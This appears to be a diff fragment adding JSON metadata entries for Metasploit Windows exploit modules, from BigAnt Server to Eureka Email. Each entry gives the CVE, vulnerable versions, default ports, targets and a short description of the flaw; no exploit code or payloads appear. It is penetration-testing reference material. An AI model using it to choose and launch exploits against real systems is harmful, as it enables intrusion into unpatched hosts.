"disclosure_date": "2008-04-15", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in BigAnt Server 2.2.\n By sending a specially crafted packet, an attacker may be\n able to execute arbitrary code.", + "references": [ + "CVE-2008-1914", + "OSVDB-44454", + "BID-28795" + ], + "platform": "Windows", + "arch": "", + "rport": 6080, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows 2000 Pro All English", + "Windows XP Pro SP0/SP1 English" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/bigant_server.rb", + "is_install_path": true, + "ref_name": "windows/misc/bigant_server", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/bigant_server_250": { + "name": "BigAnt Server 2.50 SP1 Buffer Overflow", + "fullname": "exploit/windows/misc/bigant_server_250", + "aliases": [], + "rank": 500, + "disclosure_date": "2008-04-15", + "type": "exploit", + "author": [ + "Dr_IDE " + ], + "description": "This exploits a stack buffer overflow in the BigAnt Messaging Service,\n part of the BigAnt Server product suite. This module was tested\n successfully against version 2.50 SP1.", + "references": [ + "CVE-2008-1914", + "OSVDB-44454", + "EDB-9673", + "EDB-9690" + ], + "platform": "Windows", + "arch": "", + "rport": 6660, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "BigAnt 2.5 Universal", + "Windows 2000 Pro All English", + "Windows XP Pro SP0/SP1 English" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/bigant_server_250.rb", + "is_install_path": true, + "ref_name": "windows/misc/bigant_server_250", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/bigant_server_dupf_upload": { + "name": "BigAnt Server DUPF Command Arbitrary File Upload", + "fullname": "exploit/windows/misc/bigant_server_dupf_upload", + "aliases": [], + "rank": 600, + "disclosure_date": "2013-01-09", + "type": "exploit", + "author": [ + "Hamburgers Maccoy", + "juan vazquez " + ], + "description": "This exploits an arbitrary file upload vulnerability in BigAnt Server 2.97 SP7.\n A lack of authentication allows to make unauthenticated file uploads through a DUPF\n command. Additionally the filename option in the same command can be used to launch\n a directory traversal attack and achieve arbitrary file upload.\n\n The module uses the Windows Management Instrumentation service to execute an\n arbitrary payload on vulnerable installations of BigAnt on Windows XP and 2003. It\n has been successfully tested on BigAnt Server 2.97 SP7 over Windows XP SP3 and 2003\n SP2.", + "references": [ + "CVE-2012-6274", + "US-CERT-VU-990652", + "BID-57214", + "OSVDB-89342" + ], + "platform": "Windows", + "arch": "", + "rport": 6661, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "BigAnt Server 2.97 SP7" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/bigant_server_dupf_upload.rb", + "is_install_path": true, + "ref_name": "windows/misc/bigant_server_dupf_upload", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": true + }, + "exploit_windows/misc/bigant_server_sch_dupf_bof": { + "name": "BigAnt Server 2 SCH And DUPF Buffer Overflow", + "fullname": "exploit/windows/misc/bigant_server_sch_dupf_bof", + "aliases": [], + "rank": 300, + "disclosure_date": "2013-01-09", + "type": "exploit", + "author": [ + "Hamburgers Maccoy", + "juan vazquez " + ], + "description": "This exploits a stack buffer overflow in BigAnt Server 2.97 SP7. The\n vulnerability is due to the dangerous usage of strcpy while handling errors. This\n module uses a combination of SCH and DUPF request to trigger the vulnerability, and\n has been tested successfully against version 2.97 SP7 over Windows XP SP3 and\n Windows 2003 SP2.", + "references": [ + "CVE-2012-6275", + "US-CERT-VU-990652", + "BID-57214", + "OSVDB-89344" + ], + "platform": "Windows", + "arch": "", + "rport": 6661, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "BigAnt Server 2.97 SP7 / Windows XP SP3", + "BigAnt Server 2.97 SP7 / Windows 2003 SP2" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/bigant_server_sch_dupf_bof.rb", + "is_install_path": true, + "ref_name": "windows/misc/bigant_server_sch_dupf_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/bigant_server_usv": { + "name": "BigAnt Server 2.52 USV Buffer Overflow", + "fullname": "exploit/windows/misc/bigant_server_usv", + "aliases": [], + "rank": 500, + "disclosure_date": "2009-12-29", + "type": "exploit", + "author": [ + "Lincoln", + "DouBle_Zer0", + "jduck " + ], + "description": "This exploits a stack buffer overflow in the BigAnt Messaging Service,\n part of the BigAnt Server product suite. This module was tested\n successfully against version 2.52.\n\n NOTE: The AntServer service does not restart, you only get one shot.", + "references": [ + "CVE-2009-4660", + "OSVDB-61386", + "EDB-10765", + "EDB-10973" + ], + "platform": "Windows", + "arch": "", + "rport": 6660, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "BigAnt 2.52 Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/bigant_server_usv.rb", + "is_install_path": true, + "ref_name": "windows/misc/bigant_server_usv", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/bomberclone_overflow": { + "name": "Bomberclone 0.11.6 Buffer Overflow", + "fullname": "exploit/windows/misc/bomberclone_overflow", + "aliases": [], + "rank": 200, + "disclosure_date": "2006-02-16", + "type": "exploit", + "author": [ + "Jacopo Cervini " + ], + "description": "This module exploits a stack buffer overflow in Bomberclone 0.11.6 for Windows.\n The return address is overwritten with lstrcpyA memory address,\n the second and third value are the destination buffer,\n the fourth value is the source address of our buffer in the stack.\n This exploit is like a return in libc.\n\n ATTENTION\n The shellcode is exec ONLY when someone try to close bomberclone.", + "references": [ + "CVE-2006-0460", + "OSVDB-23263", + "BID-16697" + ], + "platform": "Windows", + "arch": "", + "rport": 11000, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "Windows XP SP2 Italian", + "Windows 2000 SP1 English", + "Windows 2000 SP1 English" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/bomberclone_overflow.rb", + "is_install_path": true, + "ref_name": "windows/misc/bomberclone_overflow", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/bopup_comm": { + "name": "Bopup Communications Server Buffer Overflow", + "fullname": "exploit/windows/misc/bopup_comm", + "aliases": [], + "rank": 400, + "disclosure_date": "2009-06-18", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in Bopup Communications Server 3.2.26.5460.\n By sending a specially crafted packet, an attacker may be\n able to execute arbitrary code.", + "references": [ + "CVE-2009-2227", + "OSVDB-55275", + "URL-http://www.blabsoft.com/products/server", + "EDB-9002" + ], + "platform": "Windows", + "arch": "", + "rport": 19810, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Bopup Communications Server 3.2.26.5460" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/bopup_comm.rb", + "is_install_path": true, + "ref_name": "windows/misc/bopup_comm", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/borland_interbase": { + "name": "Borland Interbase Create-Request Buffer Overflow", + "fullname": "exploit/windows/misc/borland_interbase", + "aliases": [], + "rank": 200, + "disclosure_date": "2007-07-24", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in Borland Interbase 2007.\n By sending a specially crafted create-request packet, a remote\n attacker may be able to execute arbitrary code.", + "references": [ + "CVE-2007-3566", + "OSVDB-38602", + "URL-http://dvlabs.tippingpoint.com/advisory/TPTI-07-13" + ], + "platform": "Windows", + "arch": "", + "rport": 3050, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows 2000 English All / Borland InterBase 2007" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/borland_interbase.rb", + "is_install_path": true, + "ref_name": "windows/misc/borland_interbase", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/borland_starteam": { + "name": "Borland CaliberRM StarTeam Multicast Service Buffer Overflow", + "fullname": "exploit/windows/misc/borland_starteam", + "aliases": [], + "rank": 200, + "disclosure_date": "2008-04-02", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in Borland CaliberRM 2006. By sending\n a specially crafted GET request to the STMulticastService, an attacker may be\n able to execute arbitrary code.", + "references": [ + "CVE-2008-0311", + "OSVDB-44039", + "BID-28602" + ], + "platform": "Windows", + "arch": "", + "rport": 3057, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Windows 2000 SP4 English", + "Windows 2003 SP0 English" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/borland_starteam.rb", + "is_install_path": true, + "ref_name": "windows/misc/borland_starteam", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/citrix_streamprocess": { + "name": "Citrix Provisioning Services 5.6 streamprocess.exe Buffer Overflow", + "fullname": "exploit/windows/misc/citrix_streamprocess", + "aliases": [], + "rank": 400, + "disclosure_date": "2011-01-20", + "type": "exploit", + "author": [ + "mog" + ], + "description": "This module exploits a stack buffer overflow in Citrix Provisioning Services 5.6.\n By sending a specially crafted packet to the Provisioning Services server, a fixed\n length buffer on the stack can be overflowed and arbitrary code can be executed.", + "references": [ + "OSVDB-70597", + "ZDI-11-023", + "URL-http://web.archive.org/web/20110123164820/http://secunia.com:80/advisories/42954/", + "URL-http://support.citrix.com/article/CTX127149" + ], + "platform": "Windows", + "arch": "", + "rport": 6905, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP SP3 / Windows Server 2003 SP2 / Windows Vista" + ], + "mod_time": "2023-03-23 10:19:30 +0000", + "path": "/modules/exploits/windows/misc/citrix_streamprocess.rb", + "is_install_path": true, + "ref_name": "windows/misc/citrix_streamprocess", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/citrix_streamprocess_data_msg": { + "name": "Citrix Provisioning Services 5.6 SP1 Streamprocess Opcode 0x40020000 Buffer Overflow", + "fullname": "exploit/windows/misc/citrix_streamprocess_data_msg", + "aliases": [], + "rank": 300, + "disclosure_date": "2011-11-04", + "type": "exploit", + "author": [ + "AbdulAziz Hariri", + "alino <26alino@gmail.com>" + ], + "description": "This module exploits a remote buffer overflow in the Citrix Provisioning Services\n 5.6 SP1 (without Hotfix CPVS56SP1E043) by sending a malformed packet to the\n 6905/UDP port. The module has been successfully tested on Windows Server 2003 SP2,\n Windows 7, and Windows XP SP3.", + "references": [ + "OSVDB-75780", + "BID-49803", + "ZDI-12-009", + "URL-http://support.citrix.com/article/CTX130846" + ], + "platform": "Windows", + "arch": "", + "rport": 6905, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Citrix Provisioning Services 5.6 SP1" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/citrix_streamprocess_data_msg.rb", + "is_install_path": true, + "ref_name": "windows/misc/citrix_streamprocess_data_msg", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/citrix_streamprocess_get_boot_record_request": { + "name": "Citrix Provisioning Services 5.6 SP1 Streamprocess Opcode 0x40020004 Buffer Overflow", + "fullname": "exploit/windows/misc/citrix_streamprocess_get_boot_record_request", + "aliases": [], + "rank": 300, + "disclosure_date": "2011-11-04", + "type": "exploit", + "author": [ + "alino <26alino@gmail.com>", + "juan vazquez " + ], + "description": "This module exploits a remote buffer overflow in the Citrix Provisioning Services\n 5.6 SP1 (without Hotfix CPVS56SP1E043) by sending a malformed packet with the opcode\n 0x40020004 (GetBootRecordRequest) to the 6905/UDP port. The module, which allows\n code execution under the context of SYSTEM, has been successfully tested on Windows Server\n 2003 SP2 and Windows XP SP3.", + "references": [ + "OSVDB-75780", + "BID-49803", + "URL-http://support.citrix.com/article/CTX130846" + ], + "platform": "Windows", + "arch": "", + "rport": 6905, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Citrix Provisioning Services 5.6 SP1" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/citrix_streamprocess_get_boot_record_request.rb", + "is_install_path": true, + "ref_name": "windows/misc/citrix_streamprocess_get_boot_record_request", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/citrix_streamprocess_get_footer": { + "name": "Citrix Provisioning Services 5.6 SP1 Streamprocess Opcode 0x40020002 Buffer Overflow", + "fullname": "exploit/windows/misc/citrix_streamprocess_get_footer", + "aliases": [], + "rank": 300, + "disclosure_date": "2011-11-04", + "type": "exploit", + "author": [ + "alino <26alino@gmail.com>", + "juan vazquez " + ], + "description": "This module exploits a remote buffer overflow in the Citrix Provisioning Services\n 5.6 SP1 (without Hotfix CPVS56SP1E043) by sending a malformed packet with the opcode\n 0x40020002 (GetFooterRequest) to the 6905/UDP port. The module, which allows code execution\n under the context of SYSTEM, has been successfully tested on Windows Server 2003 SP2\n and Windows XP SP3.", + "references": [ + "OSVDB-75780", + "BID-49803", + "URL-http://support.citrix.com/article/CTX130846" + ], + "platform": "Windows", + "arch": "", + "rport": 6905, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Citrix Provisioning Services 5.6 SP1" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/citrix_streamprocess_get_footer.rb", + "is_install_path": true, + "ref_name": "windows/misc/citrix_streamprocess_get_footer", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/citrix_streamprocess_get_objects": { + "name": "Citrix Provisioning Services 5.6 SP1 Streamprocess Opcode 0x40020006 Buffer Overflow", + "fullname": "exploit/windows/misc/citrix_streamprocess_get_objects", + "aliases": [], + "rank": 300, + "disclosure_date": "2011-11-04", + "type": "exploit", + "author": [ + "Anyway ", + "alino <26alino@gmail.com>", + "juan vazquez " + ], + "description": "This module exploits a remote buffer overflow in the Citrix Provisioning Services\n 5.6 SP1 (without Hotfix CPVS56SP1E043) by sending a malformed packet with the opcode\n 0x40020006 (GetObjetsRequest) to the 6905/UDP port. The module, which allows code execution\n under the context of SYSTEM, has been successfully tested on Windows Server 2003 SP2\n and Windows XP SP3.", + "references": [ + "OSVDB-75780", + "BID-49803", + "URL-http://support.citrix.com/article/CTX130846", + "ZDI-12-010" + ], + "platform": "Windows", + "arch": "", + "rport": 6905, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Citrix Provisioning Services 5.6 SP1" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/citrix_streamprocess_get_objects.rb", + "is_install_path": true, + "ref_name": "windows/misc/citrix_streamprocess_get_objects", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/cloudme_sync": { + "name": "CloudMe Sync v1.10.9", + "fullname": "exploit/windows/misc/cloudme_sync", + "aliases": [], + "rank": 500, + "disclosure_date": "2018-01-17", + "type": "exploit", + "author": [ + "hyp3rlinx", + "Daniel Teixeira" + ], + "description": "This module exploits a stack-based buffer overflow vulnerability\n in CloudMe Sync v1.10.9 client application. This module has been\n tested successfully on Windows 7 SP1 x86.", + "references": [ + "CVE-2018-6892", + "EDB-44027" + ], + "platform": "Windows", + "arch": "", + "rport": 8888, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "CloudMe Sync v1.10.9" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/cloudme_sync.rb", + "is_install_path": true, + "ref_name": "windows/misc/cloudme_sync", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/commvault_cmd_exec": { + "name": "Commvault Communications Service (cvd) Command Injection", + "fullname": "exploit/windows/misc/commvault_cmd_exec", + "aliases": [], + "rank": 400, + "disclosure_date": "2017-12-12", + "type": "exploit", + "author": [ + "b0yd" + ], + "description": "This module exploits a command injection vulnerability\n discovered in Commvault Service v11 SP5 and earlier versions (tested in v11 SP5\n and v10). The vulnerability exists in the cvd.exe service and allows an\n attacker to execute arbitrary commands in the context of the service. By\n default, the Commvault Communications service installs and runs as SYSTEM in\n Windows and does not require authentication. This vulnerability was discovered\n in the Windows version. The Linux version wasn't tested.", + "references": [ + "CVE-2017-18044", + "URL-https://www.securifera.com/advisories/sec-2017-0001/" + ], + "platform": "Windows", + "arch": "", + "rport": 8400, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Commvault Communications Service (cvd) / Microsoft Windows 7 and higher" + ], + "mod_time": "2020-09-22 02:56:51 +0000", + "path": "/modules/exploits/windows/misc/commvault_cmd_exec.rb", + "is_install_path": true, + "ref_name": "windows/misc/commvault_cmd_exec", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/crosschex_device_bof": { + "name": "Anviz CrossChex Buffer Overflow", + "fullname": "exploit/windows/misc/crosschex_device_bof", + "aliases": [], + "rank": 300, + "disclosure_date": "2019-11-28", + "type": "exploit", + "author": [ + "Luis Catarino ", + "Pedro Rodrigues ", + "agalway-r7", + "adfoster-r7" + ], + "description": "Waits for broadcasts from Ainz CrossChex looking for new devices, and returns a custom broadcast,\n triggering a stack buffer overflow.", + "references": [ + "CVE-2019-12518", + "URL-https://www.0x90.zone/multiple/reverse/2019/11/28/Anviz-pwn.html", + "EDB-47734" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Crosschex Standard x86 <= V4.3.12" + ], + "mod_time": "2020-03-05 14:48:37 +0000", + "path": "/modules/exploits/windows/misc/crosschex_device_bof.rb", + "is_install_path": true, + "ref_name": "windows/misc/crosschex_device_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/cve_2022_28381_allmediaserver_bof": { + "name": "ALLMediaServer 1.6 SEH Buffer Overflow", + "fullname": "exploit/windows/misc/cve_2022_28381_allmediaserver_bof", + "aliases": [], + "rank": 400, + "disclosure_date": "2022-04-01", + "type": "exploit", + "author": [ + "Hejap Zairy Al-Sharif" + ], + "description": "This module exploits a stack buffer overflow leading to a SEH handler overwrite\n in ALLMediaServer 1.6. The vulnerability is caused due to a boundary error\n within the handling of a HTTP request. Note that this exploit will only work\n against x86 or WoW64 targets, x64 is not supported at this time.", + "references": [ + "CVE-2022-28381", + "URL-https://github.com/Matrix07ksa/ALLMediaServer-1.6-Buffer-Overflow" + ], + "platform": "Windows", + "arch": "x86", + "rport": 888, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "ALLMediaServer 1.6" + ], + "mod_time": "2022-04-01 17:57:27 +0000", + "path": "/modules/exploits/windows/misc/cve_2022_28381_allmediaserver_bof.rb", + "is_install_path": true, + "ref_name": "windows/misc/cve_2022_28381_allmediaserver_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-service-down" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [ + "ioc-in-logs" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/delta_electronics_infrasuite_deserialization": { + "name": "Delta Electronics InfraSuite Device Master Deserialization", + "fullname": "exploit/windows/misc/delta_electronics_infrasuite_deserialization", + "aliases": [], + "rank": 600, + "disclosure_date": "2023-05-17", + "type": "exploit", + "author": [ + "Anonymous", + "Shelby Pace" + ], + "description": "Delta Electronics InfraSuite Device Master versions below v1.0.5 have an\n unauthenticated .NET deserialization vulnerability within the 'ParseUDPPacket()'\n method of the 'Device-Gateway-Status' process.\n\n The 'ParseUDPPacket()' method reads user-controlled packet data and eventually\n calls 'BinaryFormatter.Deserialize()' on what it determines to be the packet header without appropriate validation,\n leading to unauthenticated code execution as the user running the 'Device-Gateway-Status' process.", + "references": [ + "CVE-2023-1133", + "URL-https://www.zerodayinitiative.com/advisories/ZDI-23-672/", + "URL-https://attackerkb.com/topics/owl4Xz8fKW/cve-2023-1133" + ], + "platform": "Windows", + "arch": "cmd, x86, x64", + "rport": 10100, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Windows EXE Dropper", + "Windows CMD" + ], + "mod_time": "2023-06-07 16:42:01 +0000", + "path": "/modules/exploits/windows/misc/delta_electronics_infrasuite_deserialization.rb", + "is_install_path": true, + "ref_name": "windows/misc/delta_electronics_infrasuite_deserialization", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "artifacts-on-disk", + "ioc-in-logs", + "screen-effects" + ], + "Reliability": [ + "repeatable-session" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/disk_savvy_adm": { + "name": "Disk Savvy Enterprise v10.4.18", + "fullname": "exploit/windows/misc/disk_savvy_adm", + "aliases": [], + "rank": 500, + "disclosure_date": "2017-01-31", + "type": "exploit", + "author": [ + "Daniel Teixeira" + ], + "description": "This module exploits a stack-based buffer overflow vulnerability\n in Disk Savvy Enterprise v10.4.18, caused by improper bounds\n checking of the request sent to the built-in server. This module\n has been tested successfully on Windows 7 SP1 x86.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": 9124, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Disk Savvy Enterprise v10.4.18" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/disk_savvy_adm.rb", + "is_install_path": true, + "ref_name": "windows/misc/disk_savvy_adm", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/doubletake": { + "name": "DoubleTake/HP StorageWorks Storage Mirroring Service Authentication Overflow", + "fullname": "exploit/windows/misc/doubletake", + "aliases": [], + "rank": 200, + "disclosure_date": "2008-06-04", + "type": "exploit", + "author": [ + "ri0t " + ], + "description": "This module exploits a stack buffer overflow in the authentication mechanism of\n NSI Doubletake which is also rebranded as HP Storage Works. This vulnerability\n was found by Titon of Bastard Labs.", + "references": [ + "CVE-2008-1661", + "OSVDB-45924" + ], + "platform": "Windows", + "arch": "", + "rport": 1100, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "doubletake 4.5.0", + "doubletake 4.4.2", + "doubletake 4.5.0.1819" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/doubletake.rb", + "is_install_path": true, + "ref_name": "windows/misc/doubletake", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/eiqnetworks_esa": { + "name": "eIQNetworks ESA License Manager LICMGR_ADDLICENSE Overflow", + "fullname": "exploit/windows/misc/eiqnetworks_esa", + "aliases": [], + "rank": 200, + "disclosure_date": "2006-07-24", + "type": "exploit", + "author": [ + "MC ", + "ri0t ", + "kf " + ], + "description": "This module exploits a stack buffer overflow in eIQnetworks\n Enterprise Security Analyzer. During the processing of\n long arguments to the LICMGR_ADDLICENSE command, a stack-based\n buffer overflow occurs. This module has only been tested\n against ESA v2.1.13.", + "references": [ + "CVE-2006-3838", + "OSVDB-27526", + "BID-19163", + "ZDI-06-024" + ], + "platform": "Windows", + "arch": "", + "rport": 10616, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "EnterpriseSecurityAnalyzerv21 Universal", + "EiQ Enterprise Security Analyzer Offset 494 Windows 2000 SP0-SP4 English", + "EiQ Enterprise Security Analyzer Offset 494 Windows XP English SP1/SP2", + "EiQ Enterprise Security Analyzer Offset 494 Windows Server 2003 SP0/SP1", + "Astaro Report Manager (OEM) Offset 1262 Windows 2000 SP0-SP4 English", + "Astaro Report Manager (OEM) Offset 1262 Windows XP English SP1/SP2", + "Astaro Report Manager (OEM) Offset 1262 Windows Server 2003 English SP0/SP1", + "Fortinet FortiReporter (OEM) Offset 1262 Windows 2000 SP0-SP4 English", + "Fortinet FortiReporter (OEM) Offset 1262 Windows XP English SP1/SP2", + "Fortinet FortiReporter (OEM) Offset 1262 Windows Server 2003 English SP0/SP1", + "iPolicy Security Reporter (OEM) Offset 1262 Windows 2000 SP0-SP4 English", + "iPolicy Security Reporter (OEM) Offset 1262 Windows XP English SP1/SP2", + "iPolicy Security Reporter (OEM) Offset 1262 Windows Server 2003 English SP0/SP1", + "SanMina Viking Multi-Log Manager (OEM) Offset 1262 Windows 2000 SP0-SP4 English", + "SanMina Viking Multi-Log Manager (OEM) Offset 1262 Windows XP English SP1/SP2", + "SanMina Viking Multi-Log Manager (OEM) Offset 1262 Windows Server 2003 English SP0/SP1", + "Secure Computing G2 Security Reporter (OEM) Offset 1262 Windows 2000 SP0-SP4 English", + "Secure Computing G2 Security Reporter (OEM) Offset 1262 Windows XP English SP1/SP2", + "Secure Computing G2 Security Reporter (OEM) Offset 1262 Windows Server 2003 English SP0/SP1", + "Top Layer Network Security Analyzer (OEM) Offset 1262 Windows 2000 SP0-SP4 English", + "Top Layer Network Security Analyzer (OEM) Offset 1262 Windows XP English SP1/SP2", + "Top Layer Network Security Analyzer (OEM) Offset 1262 Windows Server 2003 English SP0/SP1" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/eiqnetworks_esa.rb", + "is_install_path": true, + "ref_name": "windows/misc/eiqnetworks_esa", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/eiqnetworks_esa_topology": { + "name": "eIQNetworks ESA Topology DELETEDEVICE Overflow", + "fullname": "exploit/windows/misc/eiqnetworks_esa_topology", + "aliases": [], + "rank": 200, + "disclosure_date": "2006-07-25", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in eIQnetworks\n Enterprise Security Analyzer. During the processing of\n long arguments to the DELETEDEVICE command in the Topology\n server, a stack-based buffer overflow occurs.\n\n This module has only been tested against ESA v2.1.13.", + "references": [ + "CVE-2006-3838", + "OSVDB-27528", + "BID-19164" + ], + "platform": "Windows", + "arch": "", + "rport": 10628, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "Windows 2000 SP4 English", + "Windows XP SP2 English", + "Windows 2003 SP1 English" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/eiqnetworks_esa_topology.rb", + "is_install_path": true, + "ref_name": "windows/misc/eiqnetworks_esa_topology", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/enterasys_netsight_syslog_bof": { + "name": "Enterasys NetSight nssyslogd.exe Buffer Overflow", + "fullname": "exploit/windows/misc/enterasys_netsight_syslog_bof", + "aliases": [], + "rank": 300, + "disclosure_date": "2011-12-19", + "type": "exploit", + "author": [ + "Jeremy Brown", + "rgod ", + "juan vazquez " + ], + "description": "This module exploits a stack buffer overflow in Enterasys NetSight. The\n vulnerability exists in the Syslog service (nssylogd.exe) when parsing a specially\n crafted PRIO from a syslog message. The module has been tested successfully on\n Enterasys NetSight 4.0.1.34 over Windows XP SP3 and Windows 2003 SP2.", + "references": [ + "CVE-2011-5227", + "OSVDB-77971", + "BID-51124", + "ZDI-11-350" + ], + "platform": "Windows", + "arch": "", + "rport": 514, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Enterasys NetSight 4.0.1.34 / Windows XP SP3", + "Enterasys NetSight 4.0.1.34 / Windows 2003 SP2" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/enterasys_netsight_syslog_bof.rb", + "is_install_path": true, + "ref_name": "windows/misc/enterasys_netsight_syslog_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/eureka_mail_err": { + "name": "Eureka Email 2.2q ERR Remote Buffer Overflow", + "fullname": "exploit/windows/misc/eureka_mail_err", + "aliases": [], + "rank": 300, + "disclosure_date": "2009-10-22", + "type": "exploit", + "author": [ + "Francis Provencher (Protek Research Labs)", + "Dr_IDE", + "dookie", + "jduck " + ], + "description": "This module exploits a buffer overflow in the Eureka Email 2.2q\n client that is triggered through an excessively long ERR message.\n\n NOTE: this exploit isn't very reliable. Unfortunately reaching the\n vulnerable code can only be done when manually checking mail (Ctrl-M).\n Checking at startup will not reach the code targeted here.", + "references": [ + "CVE-2009-3837", + "OSVDB-59262", + "EDB-10235" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Win XP SP3 English", + "Win XP SP2 English" + 